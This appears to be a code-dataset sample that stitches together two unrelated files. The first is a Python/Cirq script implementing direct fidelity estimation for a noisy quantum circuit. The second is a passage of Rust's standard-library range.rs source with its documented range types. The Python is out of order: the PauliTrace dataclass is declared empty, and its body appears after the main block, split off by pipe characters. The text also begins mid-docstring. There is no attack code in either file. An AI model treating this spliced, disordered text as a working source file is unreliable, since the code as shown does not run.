Fidelity between the desired pure state rho and the actual state sigma is
defined as:
F(rho, sigma) = Tr (rho sigma)
It is a unit-less measurement between 0.0 and 1.0. The following two papers
independently described a faster way to estimate its value:
Direct Fidelity Estimation from Few Pauli Measurements
https://arxiv.org/abs/1104.4695
Practical characterization of quantum devices without tomography
https://arxiv.org/abs/1104.3835
This code implements the algorithm proposed for an example circuit (defined in
the function build_circuit()) and a noise model (defined in the variable noise).
"""
from typing import cast, List, Optional, Tuple
import argparse
import asyncio
from dataclasses import dataclass
import itertools
import random
import sys
import numpy as np
import cirq
def build_circuit() -> Tuple[cirq.Circuit, List[cirq.Qid]]:
# Builds an arbitrary circuit to test. Do not include a measurement gate.
# The circuit need not be Clifford, but if it is, simulations will be
# faster.
qubits: List[cirq.Qid] = cast(List[cirq.Qid], cirq.LineQubit.range(3))
circuit: cirq.Circuit = cirq.Circuit(cirq.CNOT(qubits[0], qubits[2]),
cirq.Z(qubits[0]), cirq.H(qubits[2]),
cirq.CNOT(qubits[2], qubits[1]),
cirq.X(qubits[0]), cirq.X(qubits[1]),
cirq.CNOT(qubits[0], qubits[2]))
print('Circuit used:')
print(circuit)
return circuit, qubits
def compute_characteristic_function(circuit: cirq.Circuit,
pauli_string: cirq.PauliString,
qubits: List[cirq.Qid],
density_matrix: np.ndarray):
n_qubits = len(qubits)
d = 2**n_qubits
qubit_map = dict(zip(qubits, range(n_qubits)))
# rho_i or sigma_i in https://arxiv.org/abs/1104.3835
trace = pauli_string.expectation_from_density_matrix(
density_matrix, qubit_map)
assert np.isclose(trace.imag, 0.0, atol=1e-6)
trace = trace.real
prob = trace * trace / d # Pr(i) in https://arxiv.org/abs/1104.3835
return trace, prob
async def estimate_characteristic_function(circuit: cirq.Circuit,
pauli_string: cirq.PauliString,
qubits: List[cirq.Qid],
sampler: cirq.Sampler,
samples_per_term: int):
"""
Estimates the characteristic function using a (noisy) circuit simulator by
sampling the results.
Args:
circuit: The circuit to run the simulation on.
pauli_string: The Pauli string.
qubits: The list of qubits.
sampler: Either a noisy simulator or an engine.
samples_per_term: An integer greater than 0, the number of samples.
Returns:
The estimated characteristic function.
"""
p = cirq.PauliSumCollector(circuit=circuit,
observable=pauli_string,
samples_per_term=samples_per_term)
await p.collect_async(sampler=sampler)
sigma_i = p.estimated_energy()
assert np.isclose(sigma_i.imag, 0.0, atol=1e-6)
sigma_i = sigma_i.real
return sigma_i
def _randomly_sample_from_stabilizer_bases(
stabilizer_basis: List[cirq.DensePauliString],
n_measured_operators: int, n_qubits: int):
"""
Given a stabilizer basis, randomly creates Pauli states by including the
basis vector or not.
Args:
stabilizer_basis: A list of Pauli strings that is the stabilizer basis
to sample from.
n_measured_operators: The total number of Pauli measurements, or None to
explore each Pauli state once.
n_qubits: An integer that is the number of qubits.
Returns:
A list of Pauli strings that is the Pauli states built.
"""
dense_pauli_strings = []
for _ in range(n_measured_operators):
# Build the Pauli string as a random sample of the basis elements.
dense_pauli_string = cirq.DensePauliString.eye(n_qubits)
for stabilizer in stabilizer_basis:
if np.random.randint(2) == 1:
dense_pauli_string *= stabilizer
dense_pauli_strings.append(dense_pauli_string)
return dense_pauli_strings
def _enumerate_all_from_stabilizer_bases(
stabilizer_basis: List[cirq.DensePauliString], n_qubits: int):
"""
Given a stabilizer basis, creates the exhaustive list of Pauli states that
are spanned by the basis.
Args:
stabilizer_basis: A list of Pauli strings that is the stabilizer basis
to build all the Pauli strings.
n_qubits: An integer that is the number of qubits.
Returns:
A list of Pauli strings that is the Pauli states built.
"""
dense_pauli_strings = []
for coefficients in itertools.product([False, True], repeat=n_qubits):
dense_pauli_string = cirq.DensePauliString.eye(n_qubits)
for (keep, stabilizer) in zip(coefficients, stabilizer_basis):
if keep:
dense_pauli_string *= stabilizer
dense_pauli_strings.append(dense_pauli_string)
return dense_pauli_strings
@dataclass
class PauliTrace:
|
def _estimate_pauli_traces_clifford(n_qubits: int,
clifford_state: cirq.CliffordState,
n_measured_operators: Optional[int]
) -> List[PauliTrace]:
"""
Estimates the Pauli traces in case the circuit is Clifford. When we have a
Clifford circuit, there are 2**n Pauli traces that have probability 1/2**n
and all the other traces have probability 0. In addition, there is a fast
way to find out what the traces are. See the documentation of
cirq.CliffordState for more detail. This function uses the speedup to sample
the Pauli states with non-zero probability.
Args:
n_qubits: An integer that is the number of qubits.
clifford_state: The basis of the Pauli states with non-zero probability.
n_measured_operators: The total number of Pauli measurements, or None to
explore each Pauli state once.
Returns:
A list of Pauli states (represented as tuples of Pauli string, rho_i,
and probability).
"""
# When the circuit consists of Clifford gates only, we can sample the
# Pauli states more efficiently as described on page 4 of:
# https://arxiv.org/abs/1104.4695
d = 2**n_qubits
# The stabilizer_basis variable only contains basis vectors. For
# example, if we have n=3 qubits, then we should have 2**n=8 Pauli
# states that we can sample, but the basis will still have 3 entries. We
# must flip a coin for each, whether or not to include them.
stabilizer_basis: List[cirq.DensePauliString] = clifford_state.stabilizers()
if n_measured_operators is not None:
dense_pauli_strings = _randomly_sample_from_stabilizer_bases(
stabilizer_basis, n_measured_operators, n_qubits)
assert len(dense_pauli_strings) == n_measured_operators
else:
dense_pauli_strings = _enumerate_all_from_stabilizer_bases(
stabilizer_basis, n_qubits)
assert len(dense_pauli_strings) == 2**n_qubits
pauli_traces: List[PauliTrace] = []
for dense_pauli_string in dense_pauli_strings:
# The code below is equivalent to calling
# clifford_state.wave_function() and then calling
# compute_characteristic_function() on the results (albeit with a
# wave function instead of a density matrix). It is, however,
# unnecessary to do so. Instead we directly obtain the scalar rho_i.
rho_i = dense_pauli_string.coefficient
assert np.isclose(rho_i.imag, 0.0, atol=1e-6)
rho_i = rho_i.real
dense_pauli_string *= rho_i
assert np.isclose(abs(rho_i), 1.0, atol=1e-6)
Pr_i = 1.0 / d
pauli_traces.append(
PauliTrace(P_i=dense_pauli_string.sparse(), rho_i=rho_i, Pr_i=Pr_i))
return pauli_traces
def _estimate_pauli_traces_general(qubits: List[cirq.Qid],
circuit: cirq.Circuit,
n_measured_operators: Optional[int]
) -> List[PauliTrace]:
"""
Estimates the Pauli traces in case the circuit is not Clifford. In this case
we cannot use the speedup implemented in the function
_estimate_pauli_traces_clifford() above, and so do a slow, density matrix
simulation.
Args:
qubits: The list of qubits.
circuit: The (non Clifford) circuit.
n_measured_operators: The total number of Pauli measurements, or None to
explore each Pauli state once.
Returns:
A list of Pauli states (represented as tuples of Pauli string, rho_i,
and probability).
"""
n_qubits = len(qubits)
dense_simulator = cirq.DensityMatrixSimulator()
# rho in https://arxiv.org/abs/1104.3835
clean_density_matrix = cast(
cirq.DensityMatrixTrialResult,
dense_simulator.simulate(circuit)).final_density_matrix
all_operators = itertools.product([cirq.I, cirq.X, cirq.Y, cirq.Z],
repeat=n_qubits)
if n_measured_operators is not None:
dense_operators = random.sample(tuple(all_operators),
n_measured_operators)
else:
dense_operators = list(all_operators)
pauli_traces: List[PauliTrace] = []
for P_i in dense_operators:
pauli_string = cirq.PauliString(dict(zip(qubits, P_i)))
rho_i, Pr_i = compute_characteristic_function(circuit, pauli_string,
qubits,
clean_density_matrix)
pauli_traces.append(PauliTrace(P_i=pauli_string, rho_i=rho_i,
Pr_i=Pr_i))
return pauli_traces
@dataclass
class TrialResult:
"""
Contains the results of a trial, either by simulator or actual run
"""
# The Pauli trace that was measured
pauli_trace: PauliTrace
# Coefficient of the measured/simulated pure state expanded in the Pauli
# basis scaled by sqrt(dim H), formally defined at bottom of left column of
# second page of https://arxiv.org/abs/1104.3835
sigma_i: float
@dataclass
class DFEIntermediateResult:
"""
A container for the various debug and run data from calling the function
direct_fidelity_estimation(). This is useful when running a long-computation
on an actual computer, which is expensive. This way, runs can be more easily
debugged offline.
"""
# If the circuit is Clifford, the Clifford state from which we can extract
# a list of Pauli strings for a basis of the stabilizers.
clifford_state: Optional[cirq.CliffordState]
# The list of Pauli traces we can sample from.
pauli_traces: List[PauliTrace]
# Measurement results from sampling the circuit.
trial_results: List[TrialResult]
def direct_fidelity_estimation(circuit: cirq.Circuit, qubits: List[cirq.Qid],
sampler: cirq.Sampler,
n_measured_operators: Optional[int],
samples_per_term: int):
"""
Implementation of direct fidelity estimation, as per 'Direct Fidelity
Estimation from Few Pauli Measurements' https://arxiv.org/abs/1104.4695 and
'Practical characterization of quantum devices without tomography'
https://arxiv.org/abs/1104.3835.
Args:
circuit: The circuit to run the simulation on.
qubits: The list of qubits.
sampler: Either a noisy simulator or an engine.
n_measured_operators: The total number of Pauli measurements, or None to
explore each Pauli state once.
samples_per_term: if set to 0, we use the 'sampler' parameter above as
a noise (must be of type cirq.DensityMatrixSimulator) and
simulate noise in the circuit. If greater than 0, we instead use the
'sampler' parameter directly to estimate the characteristic
function.
Returns:
The estimated fidelity and a log of the run.
"""
# n_measured_operators is upper-case N in https://arxiv.org/abs/1104.3835
# Number of qubits, lower-case n in https://arxiv.org/abs/1104.3835
n_qubits = len(qubits)
clifford_circuit = True
clifford_state: Optional[cirq.CliffordState] = None
try:
clifford_state = cirq.CliffordState(
qubit_map={qubits[i]: i for i in range(len(qubits))})
for gate in circuit.all_operations():
clifford_state.apply_unitary(gate)
except ValueError:
clifford_circuit = False
# Computes for every \hat{P_i} of https://arxiv.org/abs/1104.3835
# estimate rho_i and Pr(i). We then collect tuples (rho_i, Pr(i), \hat{Pi})
# inside the variable 'pauli_traces'.
if clifford_circuit:
assert clifford_state is not None
pauli_traces = _estimate_pauli_traces_clifford(
n_qubits, cast(cirq.CliffordState, clifford_state),
n_measured_operators)
else:
pauli_traces = _estimate_pauli_traces_general(qubits, circuit,
n_measured_operators)
p = np.asarray([x.Pr_i for x in pauli_traces])
if n_measured_operators is None:
# Since we enumerate all the possible traces, the probs should add to 1.
assert np.isclose(np.sum(p), 1.0, atol=1e-6)
p /= np.sum(p)
fidelity = 0.0
if samples_per_term == 0:
# sigma in https://arxiv.org/abs/1104.3835
if not isinstance(sampler, cirq.DensityMatrixSimulator):
raise TypeError('sampler is not a cirq.DensityMatrixSimulator '
'but samples_per_term is zero.')
noisy_simulator = cast(cirq.DensityMatrixSimulator, sampler)
noisy_density_matrix = cast(
cirq.DensityMatrixTrialResult,
noisy_simulator.simulate(circuit)).final_density_matrix
if clifford_circuit and n_measured_operators is None:
# In case the circuit is Clifford and we compute an exhaustive list of
# Pauli traces, instead of sampling we can simply enumerate them because
# they all have the same probability.
measured_pauli_traces = pauli_traces
else:
# Otherwise, randomly sample as per probability.
measured_pauli_traces = np.random.choice(pauli_traces,
size=len(pauli_traces),
p=p)
trial_results: List[TrialResult] = []
for pauli_trace in measured_pauli_traces:
measure_pauli_string: cirq.PauliString = pauli_trace.P_i
rho_i = pauli_trace.rho_i
if samples_per_term > 0:
sigma_i = asyncio.get_event_loop().run_until_complete(
estimate_characteristic_function(circuit, measure_pauli_string,
qubits, sampler,
samples_per_term))
else:
sigma_i, _ = compute_characteristic_function(
circuit, measure_pauli_string, qubits, noisy_density_matrix)
trial_results.append(
TrialResult(pauli_trace=pauli_trace, sigma_i=sigma_i))
fidelity += sigma_i / rho_i
estimated_fidelity = fidelity / len(pauli_traces)
dfe_intermediate_result = DFEIntermediateResult(
clifford_state=clifford_state,
pauli_traces=pauli_traces,
trial_results=trial_results)
return estimated_fidelity, dfe_intermediate_result
def parse_arguments(args):
"""Helper function that parses the given arguments."""
parser = argparse.ArgumentParser('Direct fidelity estimation.')
# TODO: Offer some guidance on how to set this flag. Maybe have an
# option to do an exhaustive sample and do numerical studies to know which
# choice is the best.
# Github issue: https://github.com/quantumlib/Cirq/issues/2802
parser.add_argument('--n_measured_operators',
default=10,
type=int,
help='Numbers of measured operators (Pauli strings). '
'If the circuit is Clifford, these operators are '
'computed by sampling for the basis of stabilizers. If '
'the circuit is not Clifford, this is a random sample of '
'all the possible operators. If the value of this '
'parameter is None, we enumerate all the operators '
'which is 2**n_qubit for Clifford circuits and '
'4**n_qubits otherwise.')
parser.add_argument('--samples_per_term',
default=0,
type=int,
help='Number of samples per trial or 0 if no sampling.')
return vars(parser.parse_args(args))
def main(*, n_measured_operators: Optional[int], samples_per_term: int):
circuit, qubits = build_circuit()
noise = cirq.ConstantQubitNoiseModel(cirq.depolarize(0.1))
print('Noise model: %s' % (noise))
noisy_simulator = cirq.DensityMatrixSimulator(noise=noise)
estimated_fidelity, _ = direct_fidelity_estimation(
circuit,
qubits,
noisy_simulator,
n_measured_operators=n_measured_operators,
samples_per_term=samples_per_term)
print('Estimated fidelity: %f' % (estimated_fidelity))
if __name__ == '__main__':
main(**parse_arguments(sys.argv[1:]))
| """
A class that contains the Pauli states as described on page 2 of:
https://arxiv.org/abs/1104.3835
"""
# Pauli string.
P_i: cirq.PauliString
# Coefficient of the ideal pure state expanded in the Pauli basis scaled by
# sqrt(dim H), formally defined at bottom of left column of page 2.
rho_i: float
# A probability (between 0.0 and 1.0) that is the relevance distribution,
# formally defined at top of right column of page 2.
Pr_i: float |
range.rs | // Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use fmt;
use hash::{Hash, Hasher};
/// An unbounded range (`..`).
///
/// `RangeFull` is primarily used as a [slicing index], its shorthand is `..`.
/// It cannot serve as an [`Iterator`] because it doesn't have a starting point.
///
/// # Examples
///
/// The `..` syntax is a `RangeFull`:
///
/// ```
/// assert_eq!((..), std::ops::RangeFull);
/// ```
///
/// It does not have an [`IntoIterator`] implementation, so you can't use it in
/// a `for` loop directly. This won't compile:
///
/// ```compile_fail,E0277
/// for i in .. {
/// // ...
/// }
/// ```
///
/// Used as a [slicing index], `RangeFull` produces the full array as a slice.
///
/// ```
/// let arr = [0, 1, 2, 3];
/// assert_eq!(arr[ .. ], [0,1,2,3]); // RangeFull
/// assert_eq!(arr[ ..3], [0,1,2 ]);
/// assert_eq!(arr[1.. ], [ 1,2,3]);
/// assert_eq!(arr[1..3], [ 1,2 ]);
/// ```
///
/// [`IntoIterator`]: ../iter/trait.IntoIterator.html
/// [`Iterator`]: ../iter/trait.Iterator.html
/// [slicing index]: ../slice/trait.SliceIndex.html
#[doc(alias = "..")]
#[derive(Copy, Clone, PartialEq, Eq, Hash)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct RangeFull;
#[stable(feature = "rust1", since = "1.0.0")]
impl fmt::Debug for RangeFull {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "..")
}
}
/// A (half-open) range bounded inclusively below and exclusively above
/// (`start..end`).
///
/// The `Range` `start..end` contains all values with `x >= start` and
/// `x < end`. It is empty unless `start < end`.
///
/// # Examples
///
/// ```
/// assert_eq!((3..5), std::ops::Range { start: 3, end: 5 });
/// assert_eq!(3 + 4 + 5, (3..6).sum());
///
/// let arr = ['a', 'b', 'c', 'd'];
/// assert_eq!(arr[ .. ], ['a', 'b', 'c', 'd']);
/// assert_eq!(arr[ ..3], ['a', 'b', 'c', ]);
/// assert_eq!(arr[1.. ], [ 'b', 'c', 'd']);
/// assert_eq!(arr[1..3], [ 'b', 'c' ]); // Range
/// ```
#[doc(alias = "..")]
#[derive(Clone, PartialEq, Eq, Hash)] // not Copy -- see #27186
#[stable(feature = "rust1", since = "1.0.0")]
pub struct Range<Idx> {
/// The lower bound of the range (inclusive).
#[stable(feature = "rust1", since = "1.0.0")]
pub start: Idx,
/// The upper bound of the range (exclusive).
#[stable(feature = "rust1", since = "1.0.0")]
pub end: Idx,
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<Idx: fmt::Debug> fmt::Debug for Range<Idx> {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "{:?}..{:?}", self.start, self.end)
}
}
impl<Idx: PartialOrd<Idx>> Range<Idx> {
/// Returns `true` if `item` is contained in the range.
///
/// # Examples
///
/// ```
/// #![feature(range_contains)]
///
/// use std::f32;
///
/// assert!(!(3..5).contains(&2));
/// assert!( (3..5).contains(&3));
/// assert!( (3..5).contains(&4));
/// assert!(!(3..5).contains(&5));
///
/// assert!(!(3..3).contains(&3));
/// assert!(!(3..2).contains(&3));
///
/// assert!( (0.0..1.0).contains(&0.5));
/// assert!(!(0.0..1.0).contains(&f32::NAN));
/// assert!(!(0.0..f32::NAN).contains(&0.5));
/// assert!(!(f32::NAN..1.0).contains(&0.5));
/// ```
#[unstable(feature = "range_contains", reason = "recently added as per RFC", issue = "32311")]
pub fn contains<U>(&self, item: &U) -> bool
where
Idx: PartialOrd<U>,
U: ?Sized + PartialOrd<Idx>,
{
<Self as RangeBounds<Idx>>::contains(self, item)
}
/// Returns `true` if the range contains no items.
///
/// # Examples
///
/// ```
/// #![feature(range_is_empty)]
///
/// assert!(!(3..5).is_empty());
/// assert!( (3..3).is_empty());
/// assert!( (3..2).is_empty());
/// ```
///
/// The range is empty if either side is incomparable:
///
/// ```
/// #![feature(range_is_empty)]
///
/// use std::f32::NAN;
/// assert!(!(3.0..5.0).is_empty());
/// assert!( (3.0..NAN).is_empty());
/// assert!( (NAN..5.0).is_empty());
/// ```
#[unstable(feature = "range_is_empty", reason = "recently added", issue = "48111")]
pub fn is_empty(&self) -> bool {
!(self.start < self.end)
}
}
/// A range only bounded inclusively below (`start..`).
///
/// The `RangeFrom` `start..` contains all values with `x >= start`.
///
/// *Note*: Currently, no overflow checking is done for the [`Iterator`]
/// implementation; if you use an integer range and the integer overflows, it
/// might panic in debug mode or create an endless loop in release mode. **This
/// overflow behavior might change in the future.**
///
/// # Examples
///
/// ```
/// assert_eq!((2..), std::ops::RangeFrom { start: 2 });
/// assert_eq!(2 + 3 + 4, (2..).take(3).sum());
///
/// let arr = [0, 1, 2, 3];
/// assert_eq!(arr[ .. ], [0,1,2,3]);
/// assert_eq!(arr[ ..3], [0,1,2 ]);
/// assert_eq!(arr[1.. ], [ 1,2,3]); // RangeFrom
/// assert_eq!(arr[1..3], [ 1,2 ]);
/// ```
///
/// [`Iterator`]: ../iter/trait.Iterator.html
#[doc(alias = "..")]
#[derive(Clone, PartialEq, Eq, Hash)] // not Copy -- see #27186
#[stable(feature = "rust1", since = "1.0.0")]
pub struct RangeFrom<Idx> {
/// The lower bound of the range (inclusive).
#[stable(feature = "rust1", since = "1.0.0")]
pub start: Idx,
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<Idx: fmt::Debug> fmt::Debug for RangeFrom<Idx> {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "{:?}..", self.start)
}
}
impl<Idx: PartialOrd<Idx>> RangeFrom<Idx> {
/// Returns `true` if `item` is contained in the range.
///
/// # Examples
///
/// ```
/// #![feature(range_contains)]
///
/// use std::f32;
///
/// assert!(!(3..).contains(&2));
/// assert!( (3..).contains(&3));
/// assert!( (3..).contains(&1_000_000_000));
///
/// assert!( (0.0..).contains(&0.5));
/// assert!(!(0.0..).contains(&f32::NAN));
/// assert!(!(f32::NAN..).contains(&0.5));
/// ```
#[unstable(feature = "range_contains", reason = "recently added as per RFC", issue = "32311")]
pub fn contains<U>(&self, item: &U) -> bool
where
Idx: PartialOrd<U>,
U: ?Sized + PartialOrd<Idx>,
{
<Self as RangeBounds<Idx>>::contains(self, item)
}
}
/// A range only bounded exclusively above (`..end`).
///
/// The `RangeTo` `..end` contains all values with `x < end`.
/// It cannot serve as an [`Iterator`] because it doesn't have a starting point.
///
/// # Examples
///
/// The `..end` syntax is a `RangeTo`:
///
/// ```
/// assert_eq!((..5), std::ops::RangeTo { end: 5 });
/// ```
///
/// It does not have an [`IntoIterator`] implementation, so you can't use it in
/// a `for` loop directly. This won't compile:
///
/// ```compile_fail,E0277
/// // error[E0277]: the trait bound `std::ops::RangeTo<{integer}>:
/// // std::iter::Iterator` is not satisfied
/// for i in ..5 {
/// // ...
/// }
/// ```
///
/// When used as a [slicing index], `RangeTo` produces a slice of all array
/// elements before the index indicated by `end`.
///
/// ```
/// let arr = [0, 1, 2, 3];
/// assert_eq!(arr[ .. ], [0,1,2,3]);
/// assert_eq!(arr[ ..3], [0,1,2 ]); // RangeTo
/// assert_eq!(arr[1.. ], [ 1,2,3]);
/// assert_eq!(arr[1..3], [ 1,2 ]);
/// ```
///
/// [`IntoIterator`]: ../iter/trait.IntoIterator.html
/// [`Iterator`]: ../iter/trait.Iterator.html
/// [slicing index]: ../slice/trait.SliceIndex.html
#[doc(alias = "..")]
#[derive(Copy, Clone, PartialEq, Eq, Hash)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct RangeTo<Idx> {
/// The upper bound of the range (exclusive).
#[stable(feature = "rust1", since = "1.0.0")]
pub end: Idx,
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<Idx: fmt::Debug> fmt::Debug for RangeTo<Idx> {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "..{:?}", self.end)
}
}
impl<Idx: PartialOrd<Idx>> RangeTo<Idx> {
/// Returns `true` if `item` is contained in the range.
///
/// # Examples
///
/// ```
/// #![feature(range_contains)]
///
/// use std::f32;
///
/// assert!( (..5).contains(&-1_000_000_000));
/// assert!( (..5).contains(&4));
/// assert!(!(..5).contains(&5));
///
/// assert!( (..1.0).contains(&0.5));
/// assert!(!(..1.0).contains(&f32::NAN));
/// assert!(!(..f32::NAN).contains(&0.5));
/// ```
#[unstable(feature = "range_contains", reason = "recently added as per RFC", issue = "32311")]
pub fn contains<U>(&self, item: &U) -> bool
where
Idx: PartialOrd<U>,
U: ?Sized + PartialOrd<Idx>,
{
<Self as RangeBounds<Idx>>::contains(self, item)
}
}
/// A range bounded inclusively below and above (`start..=end`).
///
/// The `RangeInclusive` `start..=end` contains all values with `x >= start`
/// and `x <= end`. It is empty unless `start <= end`.
///
/// This iterator is [fused], but the specific values of `start` and `end` after
/// iteration has finished are **unspecified** other than that [`.is_empty()`]
/// will return `true` once no more values will be produced.
///
/// [fused]: ../iter/trait.FusedIterator.html
/// [`.is_empty()`]: #method.is_empty
///
/// # Examples
///
/// ```
/// assert_eq!((3..=5), std::ops::RangeInclusive::new(3, 5));
/// assert_eq!(3 + 4 + 5, (3..=5).sum());
///
/// let arr = [0, 1, 2, 3];
/// assert_eq!(arr[ ..=2], [0,1,2 ]);
/// assert_eq!(arr[1..=2], [ 1,2 ]); // RangeInclusive
/// ```
#[doc(alias = "..=")]
#[derive(Clone)] // not Copy -- see #27186
#[stable(feature = "inclusive_range", since = "1.26.0")]
pub struct RangeInclusive<Idx> {
pub(crate) start: Idx,
pub(crate) end: Idx,
pub(crate) is_empty: Option<bool>,
// This field is:
// - `None` when next() or next_back() was never called
// - `Some(false)` when `start <= end` assuming no overflow
// - `Some(true)` otherwise
// The field cannot be a simple `bool` because the `..=` constructor can
// accept non-PartialOrd types, also we want the constructor to be const.
}
trait RangeInclusiveEquality: Sized {
fn canonicalized_is_empty(range: &RangeInclusive<Self>) -> bool;
}
impl<T> RangeInclusiveEquality for T {
#[inline]
default fn canonicalized_is_empty(range: &RangeInclusive<Self>) -> bool {
range.is_empty.unwrap_or_default()
}
}
impl<T: PartialOrd> RangeInclusiveEquality for T {
#[inline]
fn canonicalized_is_empty(range: &RangeInclusive<Self>) -> bool {
range.is_empty()
}
}
#[stable(feature = "inclusive_range", since = "1.26.0")]
impl<Idx: PartialEq> PartialEq for RangeInclusive<Idx> {
#[inline]
fn eq(&self, other: &Self) -> bool {
self.start == other.start && self.end == other.end
&& RangeInclusiveEquality::canonicalized_is_empty(self)
== RangeInclusiveEquality::canonicalized_is_empty(other)
}
}
#[stable(feature = "inclusive_range", since = "1.26.0")]
impl<Idx: Eq> Eq for RangeInclusive<Idx> {}
#[stable(feature = "inclusive_range", since = "1.26.0")]
impl<Idx: Hash> Hash for RangeInclusive<Idx> {
fn hash<H: Hasher>(&self, state: &mut H) {
self.start.hash(state);
self.end.hash(state);
RangeInclusiveEquality::canonicalized_is_empty(self).hash(state);
}
}
impl<Idx> RangeInclusive<Idx> {
/// Creates a new inclusive range. Equivalent to writing `start..=end`.
///
/// # Examples
///
/// ```
/// use std::ops::RangeInclusive;
///
/// assert_eq!(3..=5, RangeInclusive::new(3, 5));
/// ```
#[stable(feature = "inclusive_range_methods", since = "1.27.0")]
#[inline]
pub const fn new(start: Idx, end: Idx) -> Self {
Self { start, end, is_empty: None }
}
/// Returns the lower bound of the range (inclusive).
///
/// When using an inclusive range for iteration, the values of `start()` and
/// [`end()`] are unspecified after the iteration ended. To determine
/// whether the inclusive range is empty, use the [`is_empty()`] method
/// instead of comparing `start() > end()`.
///
/// Note: the value returned by this method is unspecified after the range
/// has been iterated to exhaustion.
///
/// [`end()`]: #method.end
/// [`is_empty()`]: #method.is_empty
///
/// # Examples
///
/// ```
/// assert_eq!((3..=5).start(), &3);
/// ```
#[stable(feature = "inclusive_range_methods", since = "1.27.0")]
#[inline]
pub fn start(&self) -> &Idx {
&self.start
}
/// Returns the upper bound of the range (inclusive).
///
/// When using an inclusive range for iteration, the values of [`start()`]
/// and `end()` are unspecified after the iteration ended. To determine
/// whether the inclusive range is empty, use the [`is_empty()`] method
/// instead of comparing `start() > end()`.
///
/// Note: the value returned by this method is unspecified after the range
/// has been iterated to exhaustion.
///
/// [`start()`]: #method.start
/// [`is_empty()`]: #method.is_empty
///
/// # Examples
///
/// ```
/// assert_eq!((3..=5).end(), &5);
/// ```
#[stable(feature = "inclusive_range_methods", since = "1.27.0")]
#[inline]
pub fn end(&self) -> &Idx {
&self.end
}
/// Destructures the `RangeInclusive` into (lower bound, upper (inclusive) bound).
///
/// Note: the value returned by this method is unspecified after the range
/// has been iterated to exhaustion.
///
/// # Examples
///
/// ```
/// assert_eq!((3..=5).into_inner(), (3, 5));
/// ```
#[stable(feature = "inclusive_range_methods", since = "1.27.0")]
#[inline]
pub fn into_inner(self) -> (Idx, Idx) {
(self.start, self.end)
}
}
#[stable(feature = "inclusive_range", since = "1.26.0")]
impl<Idx: fmt::Debug> fmt::Debug for RangeInclusive<Idx> {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "{:?}..={:?}", self.start, self.end)
}
}
impl<Idx: PartialOrd<Idx>> RangeInclusive<Idx> {
/// Returns `true` if `item` is contained in the range.
///
/// # Examples
///
/// ```
/// #![feature(range_contains)]
///
/// use std::f32;
///
/// assert!(!(3..=5).contains(&2));
/// assert!( (3..=5).contains(&3));
/// assert!( (3..=5).contains(&4));
/// assert!( (3..=5).contains(&5));
/// assert!(!(3..=5).contains(&6));
///
/// assert!( (3..=3).contains(&3));
/// assert!(!(3..=2).contains(&3));
///
/// assert!( (0.0..=1.0).contains(&1.0));
/// assert!(!(0.0..=1.0).contains(&f32::NAN));
/// assert!(!(0.0..=f32::NAN).contains(&0.0));
/// assert!(!(f32::NAN..=1.0).contains(&1.0));
/// ```
#[unstable(feature = "range_contains", reason = "recently added as per RFC", issue = "32311")]
pub fn contains<U>(&self, item: &U) -> bool
where
Idx: PartialOrd<U>,
U: ?Sized + PartialOrd<Idx>,
{
<Self as RangeBounds<Idx>>::contains(self, item)
}
/// Returns `true` if the range contains no items.
///
/// # Examples
///
/// ```
/// #![feature(range_is_empty)]
///
/// assert!(!(3..=5).is_empty());
/// assert!(!(3..=3).is_empty());
/// assert!( (3..=2).is_empty());
/// ```
///
/// The range is empty if either side is incomparable:
///
/// ```
/// #![feature(range_is_empty)]
///
/// use std::f32::NAN;
/// assert!(!(3.0..=5.0).is_empty());
/// assert!( (3.0..=NAN).is_empty());
/// assert!( (NAN..=5.0).is_empty());
/// ```
///
/// This method returns `true` after iteration has finished:
///
/// ```
/// #![feature(range_is_empty)]
///
/// let mut r = 3..=5;
/// for _ in r.by_ref() {}
/// // Precise field values are unspecified here
/// assert!(r.is_empty());
/// ```
#[unstable(feature = "range_is_empty", reason = "recently added", issue = "48111")]
#[inline]
pub fn is_empty(&self) -> bool {
self.is_empty.unwrap_or_else(|| !(self.start <= self.end))
}
// If this range's `is_empty` field is unknown (`None`), update it to a concrete value.
#[inline]
pub(crate) fn compute_is_empty(&mut self) {
if self.is_empty.is_none() {
self.is_empty = Some(!(self.start <= self.end));
}
}
}
/// A range only bounded inclusively above (`..=end`).
///
/// The `RangeToInclusive` `..=end` contains all values with `x <= end`.
/// It cannot serve as an [`Iterator`] because it doesn't have a starting point.
///
/// # Examples
///
/// The `..=end` syntax is a `RangeToInclusive`:
///
/// ```
/// assert_eq!((..=5), std::ops::RangeToInclusive{ end: 5 });
/// ```
///
/// It does not have an [`IntoIterator`] implementation, so you can't use it in a
/// `for` loop directly. This won't compile:
///
/// ```compile_fail,E0277
/// // error[E0277]: the trait bound `std::ops::RangeToInclusive<{integer}>:
/// // std::iter::Iterator` is not satisfied
/// for i in ..=5 {
/// // ...
/// }
/// ```
///
/// When used as a [slicing index], `RangeToInclusive` produces a slice of all
/// array elements up to and including the index indicated by `end`.
///
/// ```
/// let arr = [0, 1, 2, 3];
/// assert_eq!(arr[ ..=2], [0,1,2 ]); // RangeToInclusive
/// assert_eq!(arr[1..=2], [ 1,2 ]);
/// ```
///
/// [`IntoIterator`]: ../iter/trait.IntoIterator.html
/// [`Iterator`]: ../iter/trait.Iterator.html
/// [slicing index]: ../slice/trait.SliceIndex.html
#[doc(alias = "..=")]
#[derive(Copy, Clone, PartialEq, Eq, Hash)]
#[stable(feature = "inclusive_range", since = "1.26.0")]
pub struct RangeToInclusive<Idx> {
/// The upper bound of the range (inclusive)
#[stable(feature = "inclusive_range", since = "1.26.0")]
pub end: Idx,
}
